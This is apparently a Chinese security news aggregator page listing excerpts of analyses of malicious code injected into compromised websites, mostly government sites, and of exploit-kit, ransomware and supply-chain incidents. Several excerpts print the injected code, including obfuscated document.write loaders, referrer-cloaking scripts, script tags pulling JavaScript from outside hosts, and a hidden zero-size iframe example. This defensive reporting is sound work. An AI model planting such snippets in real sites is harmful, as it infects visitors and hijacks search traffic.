记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

宣城经济技术开发区管理委员会网站挂马分析

宣城经济技术开发区管理委员会网站挂马分析 网站名称 宣城经济技术开发区管理委员会网站 网站域名 www.xceda.gov.cn 挂马页面 http://www.xceda.gov.cn/index.html 挂马代码 var re=document.referrer; if (re.indexOf("baidu")>-1 || re.indexOf("so.com")>-1 || re.indexOf("sogou")>-1 || re.indexOf("sm.cn")>-1) { document.writeln("<div style='font-size:40px;text-align:center'>加载中请稍等</div>");
发布时间:2018-01-21 02:45 | 阅读:1932 | 评论:0 | 标签:专栏 挂马分析 挂马

海门廉政网挂马分析

海门廉政网挂马分析 网站名称 海门廉政网 网站域名 www.hmlz.gov.cn 挂马页面 http://www.hmlz.gov.cn/index.html 挂马代码 <script type="text/javascript"> window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"]('x3cx73x63x72x69x70x74 x74x79x70x65x3dx22x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74x22 x73x72x63x3dx22x68x74x74x70x73x3ax2fx2fx77x77x77x2ex62x63x64x61x73x38x2ex63x6fx6dx2fx
发布时间:2018-01-11 04:00 | 阅读:16062 | 评论:0 | 标签:专栏 挂马分析 挂马

孙吴县纪检监察网挂马分析

孙吴县纪检监察网挂马分析 网站名称 孙吴县纪检监察网 网站域名 www.hljswjjw.gov.cn 挂马页面 http://www.hljswjjw.gov.cn/index.asp 挂马推断 在index.asp页面,使用asp代码对页面请求来源进行判断,当请求来源为搜索引擎爬虫时,返回恶意页面,否则返回正常页面(包含暗链)。 挂马代码 <script language='javascript' src='http://k8976.com/js.js'></script> 恶意代码 document.writeln("<title>澳门金沙</title>"); document.writeln("<meta name="keywords"
发布时间:2018-01-07 09:55 | 阅读:20929 | 评论:0 | 标签:专栏 挂马分析 挂马

古竹镇人民政府网挂马分析

古竹镇人民政府网挂马分析 网站名称 古竹镇人民政府网 网站域名 www.guzhu.gov.cn 挂马页面 http://www.guzhu.gov.cn/index.asp 挂马代码 <script type="text/javascript" src="http://103.79.184.94:88/bclide.js"></script> 恶意代码 var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cfe824ad30beb506ef0afb3c32d38f0b"; var s = docum
发布时间:2017-11-30 03:15 | 阅读:18388 | 评论:0 | 标签:专栏 挂马分析 挂马

暗号“戒烟”:Terror EK集合八枚漏洞发起挖矿机挂马攻击

暗号“戒烟”:Terror EK集合八枚漏洞发起挖矿机挂马攻击。近期,360网络安全团队监测到一个应用漏洞破绽攻击包Terror Exploit Kit(简称TerrorEK)散布门罗币挖矿软件的挂马行为,经由过程内嵌作者的门罗币地点,将用户的机械侵占为本身挖矿赢利的对象。
发布时间:2017-09-16 11:15 | 阅读:27643 | 评论:0 | 标签:挂马 漏洞

【木马分析】360追日团队: 暗号“戒烟”:Terror EK集合八枚漏洞发起挖矿机挂马进攻

2017-09-11 18:29:21 阅读:1694次 点赞(0) 收藏 来源: 安全客
发布时间:2017-09-11 23:05 | 阅读:33765 | 评论:0 | 标签:挂马 漏洞

大型挂马团伙“擒狼”攻击分析及溯源报告

7月13日,360安全卫士检测到一起网站广告位挂马事件,大量网络广告出现集体挂马,广告内容以同城交友等诱惑信息为主,预警为“擒狼”木马攻击。我们通过对整个挂马攻击的分析溯源发现,这个木马主要功能是锁定浏览器的主页并带有远程控制后门,作者通过木马谋取暴利,是一起典型的黑产行为。 该木马通过漏洞执行,安装服务和驱动,通过驱动锁定浏览器主页,服务实现自启动并将自身注入系统进程.连接C&C下载配置和插件,其中一个插件劫持淘宝客的推广ID来实现流量变现,不排除还有其他插件实现静默安装等更多的黑产行为。 在分析过程中我们发现,利用漏洞传播仅仅是该木马的其中一种推广方式,但仅仅是这一种推广方式,在7月13日一天内,360安全卫士就拦截了3万多次攻击.因此,我们有理由相信此木马应该有一个庞大的安装基数和日活量,才能使木
发布时间:2017-08-09 01:25 | 阅读:26263 | 评论:0 | 标签:安全报告 逆向破解 挂马

【权威报告】大型挂马团伙“擒狼”攻击分析及溯源报告

2017-08-07 21:25:56 阅读:706次 点赞(0) 收藏 来源: 安全客
发布时间:2017-08-07 23:25 | 阅读:30006 | 评论:0 | 标签:挂马

网站被黑检测-网页挂马及暗链检测

什么是网页挂马网页挂马是指恶意攻击者攻击WEB网站后,在网页中嵌入一段代码或脚本,用于自动下载带有特定目的木马程序,而恶意攻击者实施恶意代码或脚本植入的行为通常称为“挂马”。什么是SEO暗链SEO暗链是SEO黑帽手法中相当普遍的一种手段。笼统地说,它就是指一些人用非正常的手段获取其他网站的权限后,修改其网站的源代码,加入指向自己网站的反向链接代码。其目的是优化自己网站中的一些关键字在搜索引擎中的排名,或是提高自己网站的搜索引擎权重。暗链实例:TR-201202-0002近日发现多家使用ECSHOP开源程序(多个版本)的网站首页被篡改,被插入seo暗链的恶意代码。使用ecshop的用户多数为了优化“ugg”关键字,请自行进行检查。检查方法:打开网站主页,右键查看网站
发布时间:2017-06-09 11:50 | 阅读:36049 | 评论:0 | 标签:挂马

技术流挂马揭秘:Flash广告与Sage2.0勒索软件的“黑金搭档”

1. 概述 360互联网安全中心近期监测到“我爱卡”网站(51credit.com)出现挂马情况,进一步分析发现,访问该网站会加载跳转到漏洞攻击包(Exploit Kit)页面的恶意Flash广告,没有专业安全防护的访问者电脑会感染号称勒索软件“集大成者”的Sage2.0,造成文件被加密勒索的惨重损失。相比以往的漏洞攻击包,此次整个攻击链完全使用Flash文件实现,不再需要HTML与Javascript脚本交互功能,呈现出新的攻击形式和较高的技术水平。 2. 技术分析 2.1 广告挂马点 图1 整体挂马流程 我爱卡网站采用了较为常见的OpenX开源广告系统,该广告系统具备较完整的商业生态,被很多大型网站采用。但是因为审核不严格,已有多次漏洞攻击包通过该广告系统进行传播[1]。 图2 返回挂马广告内容 浏览我
发布时间:2017-04-23 21:25 | 阅读:40295 | 评论:0 | 标签:WEB安全 挂马

【木马分析】挂马新招:全程纯Flash文件挂马传播勒索软件技术揭秘

2017-04-20 19:09:08 来源:安全客 作者:360安全卫士 阅读:3832次 点赞(0) 收藏 1. 概述360互联网安全中心近期监测到“我爱卡”网站(51credit.com)出现挂马情况,进一步分析发现,访问该网站会加载跳转到漏洞攻击
发布时间:2017-04-21 11:40 | 阅读:28604 | 评论:0 | 标签:挂马

BlackHole重出江湖:一次针对专业军事论坛的“游击式”挂马事件分析报告

BlackHole重出江湖:一次针对专业军事论坛的“游击式”挂马事件分析报告。1月11日,360安全卫士云安全系统检测到国内知名军事论坛“军号网”上出现可疑的挂马行为 ,随即进行追踪分析。经过进一步确认,发现这是一次攻击范围很小、时间短暂,而且被攻击者迅速清理现场的挂马, 很可能是有明确目标的针对性攻击事件 。攻击者使用改造升级版的BlackHole EK挂马工具包(BlackHole作者早在2013年已被逮捕),结合论坛的XSS漏洞进行挂马,相比普通黑产具有更高的技术水平。论坛挂马手段这次挂马点比较隐蔽,经过反复检查后确认是利用论坛的漏洞插入了挂马页面。该漏洞是Discuz论坛针对ed2k协议解析时的一个XSS漏洞[2],在解析过程论坛会自动对e2dk链接中的文
发布时间:2017-01-21 01:20 | 阅读:33360 | 评论:0 | 标签:挂马

【技术分享】利用Discuz e2dk地址XSS挂马分析报告(针对某专业军事论坛)

2017-01-19 14:59:49 来源:安全客 作者:360安全卫士 阅读:5070次 点赞(0) 收藏 1月11日,360安全卫士云安全系统检测到国内知名军事论坛“军号网”上出现可疑的挂马行为,随即进行追踪分析。经过进一步确认,发现这是一次攻击范
发布时间:2017-01-20 18:50 | 阅读:58397 | 评论:0 | 标签:xss 挂马 discuz

【木马分析】漏洞工具包利用广告位挂马针对国内用户传播Cerber4.0勒索软件

【木马分析】漏洞工具包利用广告位挂马针对国内用户传播Cerber4.0勒索软件 2016-10-24 11:15:44 来源:安全客 作者:360安全卫士 阅读:2360次 点赞(0) 收藏 一、概述十月初以来,360安全团队监测到一个通过色情网站广告利用
发布时间:2016-10-24 23:20 | 阅读:33774 | 评论:0 | 标签:挂马 漏洞

网络安全之挂马攻击的介绍和防御

0x01 介绍挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。0x02 方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码:<iframe height="0" src="http://www.cq***.com/Img/" width="0"></iframe>这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。<script src=http://%68%68%6A%32
发布时间:2016-10-11 12:15 | 阅读:27513 | 评论:0 | 标签:挂马

Mac平台BT软件Transmission官网挂马 可窃取用户密码

匿名黑客近日攻击了知名BT下载客户端Transmission的官方网站,这是该网站今年第二次成功网络攻击,合法正规的下载软件被携带有恶意程序的文件所替代。这款在Mac平台非常流行的BitTorrent客户端在本次攻击中导致Linux和Mac版本的安装文件被挂上了Keydnap木马。  ESET公司的安全研究专家率先发现了这个被污染的Transmission客户端,并表示该恶意程序的编译日期为8月28日周日。ESET团队在8月29日发现了这个木马,团队立即和Transmission开发者取得了联系,在随后几分钟内官方网站移除了含有恶意程序的DMG文件。那些在8月28日至29日通过官网下载和安装Transmission Mac客户端v2.92版本用户,应该立即查看下是否有以下文件夹和文件/App
发布时间:2016-09-01 17:10 | 阅读:26538 | 评论:0 | 标签:挂马

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云